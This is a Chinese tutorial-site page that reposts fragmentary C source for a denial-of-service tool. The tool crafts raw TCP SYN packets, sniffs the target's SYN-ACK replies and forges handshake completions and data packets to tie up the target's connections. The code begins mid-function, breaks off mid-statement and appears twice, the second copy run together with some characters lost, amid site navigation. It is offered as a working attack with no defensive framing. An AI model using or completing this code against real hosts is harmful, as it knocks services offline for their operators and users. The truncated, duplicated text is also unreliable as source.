新型D.o.S(伪造TCP连接进行数据传输的D.o.S)

sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)+optlen); //IP总长度
ipHeader.ident=1;
ipHeader.frag_and_flags=0x0040;
ipHeader.ttl=0x80;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=pAtObj->dwIP;
ipHeader.sourceIP = GetHostIP();
tcpHeader.th_ack=0;
tcpHeader.th_lenres = (optlen/4+5)<<4;
tcpHeader.th_flag=2;
tcpHeader.th_win=htons(0x4470);
tcpHeader.th_urp=0;
tcpHeader.th_seq=htonl(0x00198288);
for ( int l=StartPort; l<65535;l++)
{
int k =0;
while ( pAtObj->uAttackPort[k] != 0 )
{
tcpHeader.th_dport=pAtObj->uAttackPort[k++];
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
int sendnum = 0;
int optlentemp = optlen;
tcpHeader.th_sport=htons(l);
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
memcpy(szSendBuf+sizeof(psdHeader)+sizeof(tcpHeader),optbuf,optlentemp);
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)+optlentemp);
tcpHeader.th_sum = htons(ntohs(tcpHeader.th_sum)-(USHORT)optlentemp);
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memcpy(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader),optbuf,optlentemp);
int rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)+optlentemp, 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
if ( sendnum++ > 10 )
{
sendnum=0;
}
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return false;
}
else printf(" send ok %d \n", l);
}//endwhile
Sleep(SLEEPTIME);
}
pAtObj = pAtObj->Next;
}
return 0;
}DWORD GetHostIP()
{
DWORD dwIP=0;
int i=0;
struct hostent* lp = NULL;
char HostName[255] = {0};
gethostname(HostName,255);
lp = gethostbyname (HostName);
while ( lp->h_addr_list[i] != NULL )
i++;
dwIP = *(DWORD*)lp->h_addr_list[--i];
return dwIP;
}

USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}DWORD WINAPI ListeningFunc(LPVOID lpvoid)
{
SOCKET rawsock;
SOCKADDR_IN addr_in={0};
if ((rawsock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Sniffer Socket Setup Error!\n");
return false;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(8288);
addr_in.sin_addr.S_un.S_addr= (DWORD)lpvoid;
//对rawsock绑定本机IP和端口
int ret=bind(rawsock, (struct sockaddr *)&addr_in, sizeof(addr_in));
if(ret==SOCKET_ERROR)
{
printf("bind false\n");
exit(0);
}
DWORD lpvBuffer = 1;
DWORD lpcbBytesReturned = 0;
WSAIoctl(rawsock, SIO_RCVALL, &lpvBuffer, sizeof(lpvBuffer), NULL, 0, &lpcbBytesReturned, NULL, NULL);
while (TRUE)
{
SOCKADDR_IN from={0};
int size=sizeof(from);
char RecvBuf[256]={0};
//接收数据包
ret=recvfrom(rawsock,RecvBuf,sizeof(RecvBuf),0,(struct sockaddr*)&from,&size);
if(ret!=SOCKET_ERROR)
{
// 分析数据包
IPHEADER *lpIPheader;
lpIPheader=(IPHEADER *)RecvBuf;
if (lpIPheader->proto==IPPROTO_TCP && lpIPheader->sourceIP == inet_addr(ATTACKIP) )
{

TCPHEADER *lpTCPheader=(TCPHEADER*)(RecvBuf+sizeof(IPHEADER));
//判断是不是远程开放端口返回的数据包
if ( lpTCPheader->th_flag==0x12)
{
if ( lpTCPheader->th_ack == htonl(0x00198289) )
{//伪造第3次握手
SendData(lpTCPheader->th_ack,htonl(ntohl(lpTCPheader->th_seq)+1), \
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,NULL,FALSE,0);
//主动发出一次数据
SendData(lpTCPheader->th_ack,htonl(ntohl(lpTCPheader->th_seq)+1), \
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len);
}

}
else
{
if ( lpTCPheader->th_flag == 0x10 )
//继续发送数据
SendData(lpTCPheader->th_ack,lpTCPheader->th_seq,\
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len);
}}

}
} // end while}void SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP, char* pBuf, BOOL Isdata,DWORD dwSize)
{

SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;char szSendBuf[1024]={0};
addr_in.sin_family=AF_INET;
addr_in.sin_port = APort;
addr_in.sin_addr.S_un.S_addr = AIP;
ipHeader.h_verlen=(4<<4

关键词：新型D.o.S(伪造TCP连接进行数据传输的D.o.S)

争怎路由网：是一个主要分享无线路由器安装设置经验的网站，汇总WiFi常见问题的解决方法。争怎路由网网线连接电脑联网分出来 Internet wifi显示网站首页不能上网路由器密码 WiFi设置路由器设置 TP-Link 腾达路由器软件教程游戏教程系统下载您当前所在位置：下载首页 -> 杀毒教程
新型D.o.S(伪造TCP连接进行数据传输的D.o.S) 时间：2024/4/5作者：未知来源：争怎路由网人气： sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.tos=0; ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)+optlen); //IP总长度 ipHeader.ident=1; ipHeader.frag_and_flags=0x0040; ipHeader.ttl=0x80; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.destIP=pAtObj->dwIP; ipHeader.sourceIP = GetHostIP(); tcpHeader.th_ack=0; tcpHeader.th_lenres = (optlen/4+5)<<4; tcpHeader.th_flag=2; tcpHeader.th_win=htons(0x4470); tcpHeader.th_urp=0; tcpHeader.th_seq=htonl(0x00198288); for ( int l=StartPort; l<65535;l++) { int k =0; while ( pAtObj->uAttackPort[k] != 0 ) { tcpHeader.th_dport=pAtObj->uAttackPort[k++]; psdHeader.daddr=ipHeader.destIP; psdHeader.mbz=0; psdHeader.ptcl=IPPROTO_TCP; psdHeader.tcpl=htons(sizeof(tcpHeader)); int sendnum = 0; int optlentemp = optlen; tcpHeader.th_sport=htons(l); tcpHeader.th_sum=0; psdHeader.saddr=ipHeader.sourceIP; memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); memcpy(szSendBuf+sizeof(psdHeader)+sizeof(tcpHeader),optbuf,optlentemp); tcpHeader.th_sum=checksum((USHORT )szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)+optlentemp); tcpHeader.th_sum = htons(ntohs(tcpHeader.th_sum)-(USHORT)optlentemp); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memcpy(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader),optbuf,optlentemp); int rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)+optlentemp, 0, (struct sockaddr)&addr_in, sizeof(addr_in)); if ( sendnum++ > 10 ) { sendnum=0; } if (rect==SOCKET_ERROR) { printf("send error!:%x\n",WSAGetLastError()); return false; } else printf(" send ok %d \n", l); }//endwhile Sleep(SLEEPTIME); } pAtObj = pAtObj->Next; } return 0; }DWORD GetHostIP() { DWORD dwIP=0; int i=0; struct hostent* lp = NULL; char HostName[255] = {0}; gethostname(HostName,255); lp = gethostbyname (HostName); while ( lp->h_addr_list[i] != NULL ) i++; dwIP = (DWORD)lp->h_addr_list[--i]; return dwIP; } USHORT checksum(USHORT buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=buffer++; size -=sizeof(USHORT); } if(size) { cksum += (UCHAR)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); }DWORD WINAPI ListeningFunc(LPVOID lpvoid) { SOCKET rawsock; SOCKADDR_IN addr_in={0}; if ((rawsock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET) { printf("Sniffer Socket Setup Error!\n"); return false; } addr_in.sin_family=AF_INET; addr_in.sin_port=htons(8288); addr_in.sin_addr.S_un.S_addr= (DWORD)lpvoid; //对rawsock绑定本机IP和端口 int ret=bind(rawsock, (struct sockaddr )&addr_in, sizeof(addr_in)); if(ret==SOCKET_ERROR) { printf("bind false\n"); exit(0); } DWORD lpvBuffer = 1; DWORD lpcbBytesReturned = 0; WSAIoctl(rawsock, SIO_RCVALL, &lpvBuffer, sizeof(lpvBuffer), NULL, 0, &lpcbBytesReturned, NULL, NULL); while (TRUE) { SOCKADDR_IN from={0}; int size=sizeof(from); char RecvBuf[256]={0}; //接收数据包 ret=recvfrom(rawsock,RecvBuf,sizeof(RecvBuf),0,(struct sockaddr)&from,&size); if(ret!=SOCKET_ERROR) { // 分析数据包 IPHEADER lpIPheader; lpIPheader=(IPHEADER )RecvBuf; if (lpIPheader->proto==IPPROTO_TCP && lpIPheader->sourceIP == inet_addr(ATTACKIP) ) { TCPHEADER lpTCPheader=(TCPHEADER)(RecvBuf+sizeof(IPHEADER)); //判断是不是远程开放端口返回的数据包 if ( lpTCPheader->th_flag==0x12) { if ( lpTCPheader->th_ack == htonl(0x00198289) ) {//伪造第3次握手 SendData(lpTCPheader->th_ack,htonl(ntohl(lpTCPheader->th_seq)+1), \ lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,NULL,FALSE,0); //主动发出一次数据 SendData(lpTCPheader->th_ack,htonl(ntohl(lpTCPheader->th_seq)+1), \ lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len); } } else { if ( lpTCPheader->th_flag == 0x10 ) //继续发送数据 SendData(lpTCPheader->th_ack,lpTCPheader->th_seq,\ lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len); }} } } // end while}void SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP, char* pBuf, BOOL Isdata,DWORD dwSize) { SOCKADDR_IN addr_in; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader;char szSendBuf[1024]={0}; addr_in.sin_family=AF_INET; addr_in.sin_port = APort; addr_in.sin_addr.S_un.S_addr = AIP; ipHeader.h_verlen=(4<<4 关键词：新型D.o.S(伪造TCP连接进行数据传输的D.o.S)	*软件教程* 聊天工具办公软件杀毒教程系统工具图形图像电脑学习应用软件网络软件苹果应用多媒体区网站教程其它教程技术开发安卓教程 *人气排行* 1Windows 0day EternalBlue(永恒之蓝... 2局域网内命令大全 32017好用的公共DNS推荐 4腾讯王卡1元1天宽带活动正式开发办理！ 5小心应对也许会出现的10.10.10电脑病毒 6无线网络连接上但上不了网处理方法 7是怕不给礼金？伴娘太敬业胸挂二维码 8华平终端端口关闭方法设置说明 9WannaCry蠕虫勒索病毒用户处置方法 10新版Windows 10不惧勒索病毒 *推荐资讯* 1有趣的图像变形工具--Morpher 2CentOS下telnet退出失败的处理方法 3WPS如何设置艺术字效果? 4CSS中IE浏览器最基本的一些bug以及处理方法 5Win8系统IE10浏览器出现闪退如何办? 6微信小程序 LOL 英雄的开发介绍 7Photoshop把手机照片调成闪亮转手绘效果 8微信小程序商城项目中商品属性分类的完成 92岸黑客狂劫网络银行 10用GIF Animator 5.0让页面更生动
Copyright © 2012-2018 争怎路由网(http://www.zhengzen.com) .All Rights Reserved 网站地图友情链接免责声明：本站资源均来自互联网收集如有侵犯到您利益的地方请及时联系管理删除，敬请见谅! QQ:1006262270 邮箱:kfyvi376850063@126.com 手机版